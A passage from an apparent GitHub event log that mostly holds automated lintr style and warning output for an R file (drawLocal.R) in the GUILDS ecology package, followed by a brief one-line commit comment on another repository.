**Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n^\n```\n[R/drawLocal.R:47:10:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L47) *warning:* **no visible global function definition for ‘interp1’**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n         ^~~~~~~\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n            ~^~~\n```\n[R/drawLocal.R:47:27:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                         ~^~\n```\n[R/drawLocal.R:47:41:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                        ^~\n```\n[R/drawLocal.R:47:46:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                             ^~\n```\n[R/drawLocal.R:47:56:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                      ~^~\n```\n[R/drawLocal.R:47:75:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                                         ~^~\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:48:12:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:50:13:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < eps()] <- eps()\n^\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L51) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\tesk[esk < eps()] <- eps()\n           ^~~\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L51) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\tesk[esk < eps()] <- eps()\n           ^~~\n```\n[R/drawLocal.R:51:17:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < eps()] <- eps()\n               ~^\n```\n[R/drawLocal.R:51:26:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < eps()] <- eps()\n                        ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L56) *style:* **Use <-, not =, for assignment.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n          ^\n```\n[R/drawLocal.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n         ~^~\n```\n[R/drawLocal.R:56:20:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L56) *warning:* **no visible global function definition for ‘size’, Did you mean 'line'?**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n                   ^~~~\n```\n[R/drawLocal.R:56:20:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L56) *warning:* **no visible global function definition for ‘size’, Did you mean 'line'?**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n                   ^~~~\n```\n[R/drawLocal.R:56:26:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n                        ~^~\n```\n[R/drawLocal.R:56:42:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n                                        ~^~\n```\n[R/drawLocal.R:57:13:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L57) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidx0=which(x==0);\n            ^\n```\n[R/drawLocal.R:57:13:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\tidx0=which(x==0);\n           ~^~\n```\n[R/drawLocal.R:58:11:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L58) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(idx0)) {\n          ^\n```\n[R/drawLocal.R:59:21:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L59) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n                    ^\n```\n[R/drawLocal.R:59:21:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n                   ~^~\n```\n[R/drawLocal.R:59:31:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n                              ^~\n```\n[R/drawLocal.R:60:35:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                 ~^~\n```\n[R/drawLocal.R:60:39:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                     ~^~\n```\n[R/drawLocal.R:60:49:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                               ~^~\n```\n[R/drawLocal.R:61:37:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n                                   ~^~\n```\n[R/drawLocal.R:61:49:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n                                               ~^~\n```\n[R/drawLocal.R:61:51:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n                                                 ~^~\n```\n[R/drawLocal.R:61:55:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n                                                     ~^~\n```\n[R/drawLocal.R:62:25:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L62) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty[idx0] = aux;\n                        ^\n```\n[R/drawLocal.R:64:13:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L64) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidx1=which(x==1);\n            ^\n```\n[R/drawLocal.R:64:13:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L64) *style:* **Put spaces around all infix operators.**\n```r\n​\tidx1=which(x==1);\n           ~^~\n```\n[R/drawLocal.R:65:11:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L65) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(idx1)) {\n          ^\n```\n[R/drawLocal.R:66:22:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                     ^\n```\n[R/drawLocal.R:66:23:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                      ^\n```\n[R/drawLocal.R:66:25:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                       ~^~\n```\n[R/drawLocal.R:66:28:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                          ~^~~\n```\n[R/drawLocal.R:66:30:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                             ^\n```\n[R/drawLocal.R:66:31:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                              ^\n```\n[R/drawLocal.R:66:33:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                               ~^~~\n```\n[R/drawLocal.R:67:35:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L67) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\t  y[idx1] = -Inf;\n                                  ^\n```\n[R/drawLocal.R:68:29:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n                            ^\n```\n[R/drawLocal.R:68:30:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n                             ^\n```\n[R/drawLocal.R:68:32:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n                              ~^~~\n```\n[R/drawLocal.R:69:31:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L69) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t      y[idx1] = 0;\n                              ^\n```\n[R/drawLocal.R:70:30:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n                             ^\n```\n[R/drawLocal.R:70:32:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n                              ~^~~\n```\n[R/drawLocal.R:71:35:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L71) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\t  y[idx1] = Inf;\n                                  ^\n```\n[R/drawLocal.R:74:14:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L74) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidxp = which((x>0)&(x<1));\n             ^\n```\n[R/drawLocal.R:74:14:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp = which((x>0)&(x<1));\n            ~^~\n```\n[R/drawLocal.R:74:22:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tidxp = which((x>0)&(x<1));\n                     ^\n```\n[R/drawLocal.R:74:24:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp = which((x>0)&(x<1));\n                      ~^~\n```\n[R/drawLocal.R:74:27:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp = which((x>0)&(x<1));\n                         ~^~\n```\n[R/drawLocal.R:74:28:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tidxp = which((x>0)&(x<1));\n                           ^\n```\n[R/drawLocal.R:75:11:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L75) *style:* **Use <-, not =, for assignment.**\n```r\n​\txx=x[idxp];\n          ^\n```\n[R/drawLocal.R:75:11:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\txx=x[idxp];\n         ~^~\n```\n[R/drawLocal.R:76:13:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L76) *style:* **Use <-, not =, for assignment.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n            ^\n```\n[R/drawLocal.R:76:13:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n           ~^~\n```\n[R/drawLocal.R:76:23:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n                     ~^~\n```\n[R/drawLocal.R:76:34:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n                                ~^~\n```\n[R/drawLocal.R:77:27:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                         ~^~\n```\n[R/drawLocal.R:77:41:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                       ~^~\n```\n[R/drawLocal.R:77:45:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                           ~^\n```\n[R/drawLocal.R:78:27:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n                         ~^~\n```\n[R/drawLocal.R:78:30:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n                            ~^~\n```\n[R/drawLocal.R:78:34:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n                                ~^~\n```\n[R/drawLocal.R:79:27:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                         ~^~\n```\n[R/drawLocal.R:79:28:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L79) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                           ^\n```\n[R/drawLocal.R:79:30:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                            ~^~\n```\n[R/drawLocal.R:79:34:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                                ~^~\n```\n[R/drawLocal.R:79:36:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                                  ~^~\n```\n[R/drawLocal.R:79:39:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                                     ~^~\n```\n[R/drawLocal.R:80:19:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n                  ^\n```\n[R/drawLocal.R:80:22:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n                    ~^~\n```\n[R/drawLocal.R:80:25:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n                       ~^~\n```\n[R/drawLocal.R:81:17:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L81) *style:* **Use <-, not =, for assignment.**\n```r\n​\ty[idxp] = aux;\n                ^\n```\n[R/drawLocal.R:85:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​drawLocalCond <- function(theta,alpha_x,alpha_y,JX,JY) {\n^~~~~~~~~~~~~\n```\n[R/drawLocal.R:85:33:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L85) *style:* **Commas should always have a space after.**\n```r\n​drawLocalCond <- function(theta,alpha_x,alpha_y,JX,JY) {\n                                ^\n```\n[R/drawLocal.R:85:41:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L85) *style:* **Commas should always have a space after.**\n```r\n​drawLocalCond <- function(theta,alpha_x,alpha_y,JX,JY) {\n                                        ^\n```\n[R/drawLocal.R:85:49:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L85) *style:* **Commas should always have a space after.**\n```r\n​drawLocalCond <- function(theta,alpha_x,alpha_y,JX,JY) {\n                                                ^\n```\n[R/drawLocal.R:85:52:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L85) *style:* **Commas should always have a space after.**\n```r\n​drawLocalCond <- function(theta,alpha_x,alpha_y,JX,JY) {\n                                                   ^\n```\n[R/drawLocal.R:87:5:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L87) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = JX + JY;\n    ^\n```\n[R/drawLocal.R:91:6:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L91) *style:* **Use <-, not =, for assignment.**\n```r\n​  nx = getPX(theta,alpha_x,alpha_y,JX,JY);\n     ^\n```\n[R/drawLocal.R:91:8:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nx = getPX(theta,alpha_x,alpha_y,JX,JY);\n       ^~~~~\n```\n[R/drawLocal.R:91:8:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L91) *warning:* **no visible global function definition for ‘getPX’, Did you mean 'setPS'?**\n```r\n​  nx = getPX(theta,alpha_x,alpha_y,JX,JY);\n       ^~~~~\n```\n[R/drawLocal.R:91:20:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L91) *style:* **Commas should always have a space after.**\n```r\n​  nx = getPX(theta,alpha_x,alpha_y,JX,JY);\n                   ^\n```\n"}},"created_at":"2016-09-22T10:10:52Z"}
{"id":"4601536951","type":"CommitCommentEvent","actor":{"login":"sainbayarbattur"},"repo":{"name":"sainbayarbattur/cookbook"},"payload":{"comment":{"id":19127706,"position":null,"line":null,"path":null,"commit_id":"3fb6a84cd854266f622716fbbac182edfeda5bfb","created_at":"2016-09-22T10:11:13Z","updated_at":"2016-09-22T10:11:13Z","body":"This very usefull"}},"created_at":"2016-09-22T10:11:13Z"}
